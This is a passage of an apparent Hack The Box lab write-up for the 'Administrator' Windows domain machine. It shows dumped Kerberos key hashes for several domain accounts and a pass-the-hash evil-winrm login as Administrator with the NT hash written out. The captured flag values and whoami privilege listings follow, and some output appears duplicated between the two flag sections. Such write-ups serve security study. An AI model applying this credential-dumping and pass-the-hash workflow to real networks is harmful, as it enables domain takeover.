administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
Read flag: root.txt
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ evil-winrm -i administrator.htb -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/28/2024 9:52 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
cc25a29023e54ed422557cbd3284c1cc
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.63.212
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ===========================================
administrator\administrator S-1-5-21-1088858960-373806567-254189436-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================================== ================ =========================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Group Policy Creator Owners Group S-1-5-21-1088858960-373806567-254189436-520 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Domain Admins Group S-1-5-21-1088858960-373806567-254189436-512 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Schema Admins Group S-1-5-21-1088858960-373806567-254189436-518 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Enterprise Admins Group S-1-5-21-1088858960-373806567-254189436-519 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Denied RODC Password Replication Group Alias S-1-5-21-1088858960-373806567-254189436-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
Read flag: user.txt
*Evil-WinRM* PS C:\Users\emily> cd Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> dir
Directory: C:\Users\emily\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/30/2024 2:23 PM 2308 Microsoft Edge.lnk
-ar--- 11/28/2024 9:52 PM 34 user.txt
*Evil-WinRM* PS C:\Users\emily\Desktop> type user.txt
f16efd243f78a5bd60813461c244859b
*Evil-WinRM* PS C:\Users\emily\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.63.212
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
*Evil-WinRM* PS C:\Users\emily\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ===========================================
administrator\administrator S-1-5-21-1088858960-373806567-254189436-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================================== ================ =========================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Group Policy Creator Owners Group S-1-5-21-1088858960-373806567-254189436-520 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Domain Admins Group S-1-5-21-1088858960-373806567-254189436-512 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Schema Admins Group S-1-5-21-1088858960-373806567-254189436-518 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Enterprise Admins Group S-1-5-21-1088858960-373806567-254189436-519 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Denied RODC Password Replication Group Alias S-1-5-21-1088858960-373806567-254189436-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
References
[Password Safe](https://sourceforge.net/projects/passwordsafe/)
[targetedKerberoast]( https://github.com/ShutdownRepo/targetedKerberoast)
Lessons Learned